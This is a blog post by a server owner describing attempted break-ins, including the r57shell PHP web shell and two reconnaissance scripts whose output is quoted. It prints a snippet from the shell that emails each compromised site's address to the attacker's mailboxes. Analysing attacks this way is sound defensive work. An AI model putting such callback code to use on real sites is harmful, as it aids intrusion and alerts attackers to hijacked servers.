More Web Server Hackattacks

Currently this webserver is undergoing a barrage of attempted break-ins. Time to have a look at some, starting with the most fully-featured and pleasant looking one.

This attack is called "r57shell" version 1.3. Nice to know that it's not a beta and actively being improved. The script is hosted here there and everywhere, and there seem to be slight local variatons. The one I am going to show here is called "id.txt" and is hosted at ripway.com.

Should your server be vulnerable to this sort of cross-site scripting, it will allow a hacker access to your system. In this case, through a very functional interface. I have generated a html file from the php script displaying the screen: click here to see it. (It has been sanitized: no working buttons or links.)

Embedded within the php script was some c-source code aimed at opening sockets and connecting to the hackers using this, as well as a feature to send themselves an e-mail (sexycrunch@yahoo.com as well as @gmail.com):

$a="$visitcount = $HTTP_COOKIE_VARS["visits"]; if( $visitcount == "") {$visitcount = 0; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "ada yang inject \n$web$inj"; mail("sexycrunch@yahoo.com","setoran pak http://$web$inj", "$body");mail("sexycrunch@gmail.com","setoran pak http://$web$inj", "$body");} else $visitcount ; setcookie("visits",$visitcount);"

If the exploit is successful, the attacker can upload whatever he wants, and spread more malicious code around, distribute warez, or whatever takes his fancy.

After such a beautifully executed hack, the next one is quite boring. Hosted on concurs.org, a russian site, is a script belonging to "Osyris" which would have given him the following output had it worked:

Osirys uid=48(apache) gid=48(apache) groups=48(apache) 0sirys was here .. uname -a: Linux SCARY.stupid4trying.com 2.6.9-42.cc #1 Wed Sep 13 19:47:22 EDT 2006 i686 os: Linux id: uid=48(apache) gid=48(apache) groups=48(apache) free: 5.85 Gb used: 3.23 Gb total: 9.09 Gb

And lastly, "Mic22" doesn't want to know very much at all, at least to start with:

Mic22 OSTYPE:Linux Kernel:Linux SCARY.stupid4trying.com 2.6.9-42.cc #1 Wed Sep 13 19:47:22 EDT 2006 i686 Free:5.85 GB uid=48(apache) gid=48(apache) groups=48(apache)

All these attacks work on webservers running AppServ. From the AppServe people comes this advice:

How difference of AppServ version.
    AppServ Version
          2.4.x is a Superb stable version work for all user, by the way this version use PHP 4.x because work fine with your old PHP code.
          2.5.x is the Rock function. This version provide newest and experimental of Apache, PHP, MySQL.

Recommend for AppServ 
     We recommend for all AppServ user. You do not upgrade to new version every time when released. You should to select some version for your work if you think this version stable for you. New version is not mean good.

Old version not mean good either though...